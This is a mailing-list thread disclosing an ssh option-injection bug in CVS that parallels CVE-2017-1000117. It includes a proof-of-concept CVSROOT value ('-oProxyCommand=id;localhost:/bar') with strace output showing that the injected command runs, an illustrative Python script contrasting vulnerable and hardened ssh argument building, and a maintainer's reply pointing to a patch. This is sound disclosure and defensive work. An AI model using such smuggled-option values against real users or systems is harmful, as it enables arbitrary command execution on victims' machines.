
CVS and ssh command injection (see CVE-2017-1000117, etc.)


Hank Leininger

Aug 11, 2017, 9:15:38 AM8/11/17
to bug...@nongnu.org
Bugs in Git, Subversion, and Mercurial were just announced & patched
which allowed arbitrary local command execution if a malicious name was
used for the remote server, such as starting with - to pass options to
the ssh client:

git clone ssh://-oProxyCommand=some-command...

CVS has a similar problem with the -d option:

$ strace -f -e execve cvs -d '-oProxyCommand=id;localhost:/bar' co yada 2>&1 | egrep [^pu]id
execve("/usr/bin/cvs", ["cvs", "-d", "-oProxyCommand=id;localhost:/bar", "co", "yada"], 0x7ffe69f75a68 /* 139 vars */) = 0
[snip]
[pid 20003] execve("/usr/local/bin/ssh", ["ssh", "-oProxyCommand=id;localhost", "cvs server"], 0x5fb1fc8420 /* 141 vars */ ) = -1 ENOENT (No such file or directory)
[pid 20003] execve("/usr/bin/ssh", ["ssh", "-oProxyCommand=id;localhost", "cvs server"], 0x5fb1fc8420 /* 141 vars */) = 0
[pid 20004] execve("/bin/bash", ["/bin/bash", "-c", "exec id;localhost"], 0x32af5f10d0 /* 141 vars */) = 0
[pid 20004] execve("/usr/bin/id", ["id"], 0xec92226ae0 /* 141 vars */) = 0
ssh_exchange_identification: Connection closed by remote host

Tested vanilla CVS 1.12.13, and Gentoo CVS 1.12.12-r11.

Of course, the repo specification looks very odd, so tricking a victim
may be harder than for SCM tools where it's prefixed by an ssh://, or
masked behind a redirect, or submodule paths may be followed without
user interaction.

See also:

https://marc.info/?l=oss-security&m=150241876103454&w=2
https://marc.info/?l=subversion-announce&m=150238900328980&w=2
https://marc.info/?l=git&m=150238802328673&w=2
https://subversion.apache.org/security/CVE-2017-9800-advisory.txt

Thanks,

--

Hank Leininger <hl...@korelogic.com>
5F6D DCC8 FF53 8093 EC39 127B 091E 7F7C E898 E86C
signature.asc
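
As an added illustration (not code from the post, from CVS itself, or from the MirBSD/Debian patch, which this page does not reproduce), the script below models the argv construction that the strace above shows, and the two usual mitigations: refuse a hostname or username that begins with "-", and put "--" between ssh's options and its positional arguments so that a hostname can never be parsed as an option. The CVSROOT parser, the sample root strings and all function names are assumptions made for this example; the "-l user host command" shape follows the argv visible in the strace, and nothing here actually executes ssh.

```python
import re

# Constructed sample CVSROOT strings for the example (not real repositories).
SAMPLE_ROOTS = {
    "benign": ":ext:alice@cvs.example.org:/cvsroot",
    "bare":   "cvs.example.org:/cvsroot",
    "evil":   "-oProxyCommand=id;localhost:/bar",          # the form from the post
    "evil_user": ":ext:-oProxyCommand=id@localhost:/bar",  # same trick via the user part
}

# Simplified :ext: / host:/path parser: optional ":ext:" prefix, optional
# "user@", then "host:/path". Only the pieces ssh sees are extracted.
_EXT_RE = re.compile(
    r"^(?::ext:)?(?:(?P<user>[^@:/]+)@)?(?P<host>[^:/]+):(?P<path>/.*)$"
)


def parse_cvsroot(root):
    """Return (user, host, path); user is None when absent."""
    m = _EXT_RE.match(root)
    if not m:
        raise ValueError("not an :ext:-style CVSROOT: %r" % root)
    return m.group("user"), m.group("host"), m.group("path")


def vulnerable_ssh_argv(root, server="cvs server"):
    """Argv shape seen in the strace: the host goes straight into ssh's
    argument list, so a host starting with '-' is parsed as an ssh option
    (here -oProxyCommand=..., which ssh hands to the shell)."""
    user, host, _path = parse_cvsroot(root)
    argv = ["ssh"]
    if user:
        argv += ["-l", user]
    argv += [host, server]
    return argv


def hardened_ssh_argv(root, server="cvs server"):
    """Reject option-looking user/host values, and terminate option parsing
    with '--' so ssh treats whatever follows as host and command only."""
    user, host, _path = parse_cvsroot(root)
    for name, value in (("user", user), ("host", host)):
        if value and value.startswith("-"):
            raise ValueError(
                "refusing %s %r: looks like a command-line option" % (name, value)
            )
    argv = ["ssh"]
    if user:
        argv += ["-l", user]
    argv += ["--", host, server]
    return argv


def is_safe_cvsroot(root):
    """True when the hardened builder accepts the root, False when it refuses."""
    try:
        hardened_ssh_argv(root)
    except ValueError:
        return False
    return True


if __name__ == "__main__":
    for label, root in SAMPLE_ROOTS.items():
        print(label, "unsafe argv:", vulnerable_ssh_argv(root))
        print(label, "accepted by hardened builder:", is_safe_cvsroot(root))
```

The "--" alone would already stop ssh from reading "-oProxyCommand=id;localhost" as an option (it would then fail to resolve it as a hostname), but the explicit refusal of a leading "-" gives the user an error that names the problem instead of a confusing DNS failure, which is why the example does both.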

Thorsten Glaser

Aug 14, 2017, 3:13:11 AM8/14/17
to Hank Leininger, bug...@nongnu.org
Hank Leininger dixit:

>Of course, the repo specification looks very odd, so tricking a victim
>may be harder than for SCM tools where it's prefixed by an ssh://, or

It’s also immediately obvious and quite hard to exploit at all, I agree.

> https://marc.info/?l=oss-security&m=150241876103454&w=2

This was forwarded to me via Debian, and I fixed it in MirBSD and Debian
and wrote about it, publishing a patch:

http://www.mirbsd.org/permalinks/wlog-10_e20170811-tg.htm

Incidentally, CVS has too many mailing lists, I’m subscribed on some,
but not this one (I prefer having one list only, plus one for commits,
I’ve not fully taken over CVS upstream yet, though). But if you have
to deal with CVS again, feel free to Cc me or so.

Thanks,
//mirabilos
--
13:22⎜«neurodamage» mira, what's up man? I have a CVS question for you in #cvs
13:22⎜«neurodamage» since you're so good w. it │ «neurodamage:#cvs» i love you
13:28⎜«neurodamage:#cvs» you're a handy guy to have around for systems stuff ☺
16:06⎜<Draget:#cvs> Thank god I found you =) 20:03│«bioe007:#cvs» mira2k: ty
17:14⎜<ldiain:#cvs> Thanks big help you are :-) <bioe007> mira|nwt: ty again
18:35⎜«alturiak:#cvs» mirabilos: aw, nice. thanks :o
18:36⎜«ThunderChicken:#cvs» mirabilos FTW! 23:03⎜«mithraic:#cvs» aaah. thanks
18:41⎜«alturiak:#cvs» phew. thanks a bunch, guys. you just made my weekend :-)
18:10⎜«sumit:#cvs» mirabilos: oh ok.. thanks for that
21:57⎜<bhuey:#cvs> yeah, I really appreciate help
18:50⎜«grndlvl:#cvs» thankyou 18:50⎜«grndlvl:#cvs» worked perfectly
20:50⎜<paolo:#cvs> i see. mirabilos, thnks for your support
00:36⎜«halirutan:#cvs» ok, the obvious way:-) thx
18:44⎜«arcfide:#cvs» mirabilos, I am running OpenBSD. 18:59⎜«arcfide:#cvs»
Hrm, yes, I see what you mean. 19:01⎜«arcfide:#cvs» Yeah, thanks for the help.
21:33⎜«CardinalFang:#cvs» Ugh. Okay. Sorry for the dumb question. Thank you
21:34⎜<centosian:#cvs> mirabilos: whoa that's sweet
21:52⎜«garrett__:#cvs» much appreciated «garrett__:#cvs» thanks for your time
23:39⎜<symons:#cvs> this worked, thank you very much 16:26⎜<schweizer:#cvs> ok
thx, i'll try that 20:00⎜«stableable:#cvs» Thank you. 20:50⎜«s833:#cvs»
mirabilos: thanks a lot. 19:34⎜<bobbytek:#cvs> Thanks for confirming :)
20:08⎜<tsolox:#cvs> ...works like a charm.. thanks mirabilos
